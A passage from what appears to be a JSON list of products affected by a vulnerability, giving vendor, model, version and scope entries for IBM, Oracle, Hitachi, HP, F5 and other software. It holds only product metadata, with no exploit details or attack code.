"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.3-00"
},
{
"_id": null,
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "tuning manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.x"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-04(x64))"
},
{
"_id": null,
"model": "business server",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "1"
},
{
"_id": null,
"model": "tivoli endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2.1"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.43"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "weblogic server",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.1.10"
},
{
"_id": null,
"model": "jboss operations network",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "3.2.1"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.3"
},
{
"_id": null,
"model": "device manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "1.0.0-00"
},
{
"_id": null,
"model": "content navigator",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.4.0-00"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere partner gateway advanced edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "weblogic portal",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0.1.0"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.42"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "3.0"
},
{
"_id": null,
"model": "global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.5-00"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.5.0-02"
},
{
"_id": null,
"model": "big-ip webaccelerator hf1",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.20"
},
{
"_id": null,
"model": "primavera contract management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "xp p9000 tiered storage manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.2-01"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-10-07"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.27"
},
{
"_id": null,
"model": "tiered storage manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-05"
},
{
"_id": null,
"model": "knowledge",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.5.1.7"
},
{
"_id": null,
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.2"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "tivoli provisioning manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.0"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.1"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "websphere sensor events",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "openpages",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.1.5"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0"
},
{
"_id": null,
"model": "security threat response manager",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2012.1"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "xp p9000 replication manager",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "6.0.0-00"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.10"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.1"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.4"
},
{
"_id": null,
"model": "tivoli dynamic workload console",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1"
},
{
"_id": null,
"model": "websphere service registry and repository",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "tivoli netcool/omnibus web gui",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.4"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.35"
},
{
"_id": null,
"model": "tuning manager software (solaris(x6",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-05"
},
{
"_id": null,
"model": "tivoli composite application manager for websphere",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "ds8870",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "raplication manager software (linux(suse",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tuning manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.001"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "qradar siem mr5",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "communications webrtc session controller",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "7.0"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.3"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.07"
},
{
"_id": null,
"model": "infosphere identity insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.0.3"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.3"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.0"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-10.0"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.1-00"
},
{
"_id": null,
"model": "qradar siem mr2",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "device manager software (solaris(sp",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "device manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "business process manager express",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.5"
},
{
"_id": null,
"model": "endpoint manager for remote control",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1.0"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.39"
},
{
"_id": null,
"model": "vcenter server",
"scope": "eq",
"trust": 0.3,
"vendor": "vmware",
"version": "5.0"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "predictive insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.23"
},
{
"_id": null,
"model": "social media analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"_id": null,
"model": "device manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-07"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"_id": null,
"model": "arx",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "6.2"
},
{
"_id": null,
"model": "tivoli workload scheduler distributed",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.4"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5"
},
{
"_id": null,
"model": "global link manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.6.1-01"
},
{
"_id": null,
"model": "retail allocation",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.15"
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03"
},
{
"_id": null,
"model": "tivoli workload scheduler z/os connector",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.1"
},
{
"_id": null,
"model": "application manager for smart business",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2.1"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.0.0.31"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "10.1.3.5.0"
},
{
"_id": null,
"model": "lotus expeditor",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2.3"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"_id": null,
"model": "device manager software (linux(rhel",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-08"
},
{
"_id": null,
"model": "linux ia-64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.0"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11-01"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.5.0"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.0"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.2.0.3.0"
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1.1-03(x64))"
},
{
"_id": null,
"model": "retail back office 12.0.9in",
"scope": null,
"trust": 0.3,
"vendor": "oracle",
"version": null
},
{
"_id": null,
"model": "device manager software )",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.0-00"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.4"
},
{
"_id": null,
"model": "real-time decision platform",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "3.0"
},
{
"_id": null,
"model": "filenet content manager content engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.2.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0.2"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-10"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-09-00-07"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.1.0-00"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.5"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.31"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.5.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.05"
},
{
"_id": null,
"model": "infosphere master data management collaborative edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "-11.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.55"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.3"
},
{
"_id": null,
"model": "security qradar",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2.2"
},
{
"_id": null,
"model": "tivoli foundations for application manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.2"
},
{
"_id": null,
"model": "infosphere master data management server for product information",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "infosphere information server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.5.0.0"
},
{
"_id": null,
"model": "identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.1.5"
},
{
"_id": null,
"model": "waveset",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.1.1"
},
{
"_id": null,
"model": "tivoli identity manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1"
},
{
"_id": null,
"model": "big-ip edge gateway hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.0"
},
{
"_id": null,
"model": "network satellite server (for rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6)5.4"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-11"
},
{
"_id": null,
"model": "jdeveloper",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.24.0"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "tivoli netcool configuration manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "jp1/performance management web console",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "-08-00-11"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.4"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.402"
},
{
"_id": null,
"model": "tiered storage manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-00"
},
{
"_id": null,
"model": "device manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.2.1-01"
},
{
"_id": null,
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.00"
},
{
"_id": null,
"model": "secure analytics 2012.1r7",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-03"
},
{
"_id": null,
"model": "tuning manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00"
},
{
"_id": null,
"model": "device manager software (solaris(op",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.4.0-00"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.1.1.2"
},
{
"_id": null,
"model": "retail back office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "12.0"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "insurance ifrs analyzer",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "178.0.7"
},
{
"_id": null,
"model": "smart analytics system",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "56001"
},
{
"_id": null,
"model": "financial transaction manager",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.1"
},
{
"_id": null,
"model": "tivoli storage manager administration center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.2"
},
{
"_id": null,
"model": "rational insight",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.11"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.1"
},
{
"_id": null,
"model": "secure analytics",
"scope": "eq",
"trust": 0.3,
"vendor": "juniper",
"version": "2013.2"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"_id": null,
"model": "websphere lombardi edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.2"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "8.2"
},
{
"_id": null,
"model": "infosphere balanced warehouse c4000",
"scope": null,
"trust": 0.3,
"vendor": "ibm",
"version": null
},
{
"_id": null,
"model": "device manager software (solaris",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.1-00(x64))"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.33"
},
{
"_id": null,
"model": "fusion middleware",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "11.1.17.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.03"
},
{
"_id": null,
"model": "sitescope",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "11.24"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.5"
},
{
"_id": null,
"model": "websphere partner gateway express edition",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.0.0.3"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "7.0.1-02"
},
{
"_id": null,
"model": "retail central office",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.4"
},
{
"_id": null,
"model": "retail markdown optimization",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.0"
},
{
"_id": null,
"model": "terasoluna server framework for java",
"scope": "eq",
"trust": 0.3,
"vendor": "ntt data",
"version": "2.0.51"
},
{
"_id": null,
"model": "campaign",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.3"
},
{
"_id": null,
"model": "distributed marketing",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "9.1"
},
{
"_id": null,
"model": "tiered storage manager software (linux(sles",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "6.4.0-08"
},
{
"_id": null,
"model": "tivoli storage productivity center",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "4.2.2.177"
},
{
"_id": null,
"model": "websphere application server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "6.1.0.45"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.01"
},
{
"_id": null,
"model": "big-ip webaccelerator",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "connections",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.0.0.0"
},
{
"_id": null,
"model": "tuning manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "utilities framework",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "4.1.0.1.0"
},
{
"_id": null,
"model": "communications metasolv solution",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "6.2.10.0"
},
{
"_id": null,
"model": "primavera p6 enterprise project portfolio management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "8.0"
},
{
"_id": null,
"model": "filenet p8 platform content search engine",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "5.0"
},
{
"_id": null,
"model": "raplication manager software (linux(rhel",
"scope": "eq",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-00"
},
{
"_id": null,
"model": "linux amd64",
"scope": "eq",
"trust": 0.3,
"vendor": "debian",
"version": "6.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5"
},
{
"_id": null,
"model": "retail returns management",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "2.0"
},
{
"_id": null,
"model": "big-ip edge gateway hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "13.2"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.06"
},
{
"_id": null,
"model": "portal",
"scope": "eq",
"trust": 0.3,
"vendor": "liferay",
"version": "6.2.1"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.02"
},
{
"_id": null,
"model": "big-ip edge gateway",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.1"
},
{
"_id": null,
"model": "business process manager standard",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.5.0"
},
{
"_id": null,
"model": "xp7 global link manager software",
"scope": "eq",
"trust": 0.3,
"vendor": "hp",
"version": "7.6.0-02"
},
{
"_id": null,
"model": "secure analytics 2014.2r2",
"scope": "ne",
"trust": 0.3,
"vendor": "juniper",
"version": null
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.01"
},
{
"_id": null,
"model": "big-ip webaccelerator hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"_id": null,
"model": "rational application developer",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "7.09"
},
{
"_id": null,
"model": "rational reporting for development intelligence",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.0.21"
},
{
"_id": null,
"model": "raplication manager software (linux(suse",
"scope": "ne",
"trust": 0.3,
"vendor": "hitachi",
"version": "8.0.0-06"
},
{
"_id": null,
"model": "tivoli integrated portal",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "1.1.115"
},
{
"_id": null,
"model": "retail invoice matching",
"scope": "eq",
"trust": 0.3,
"vendor": "oracle",
"version": "14.1"
},
{
"_id": null,
"model": "tivoli application dependency discovery manager",
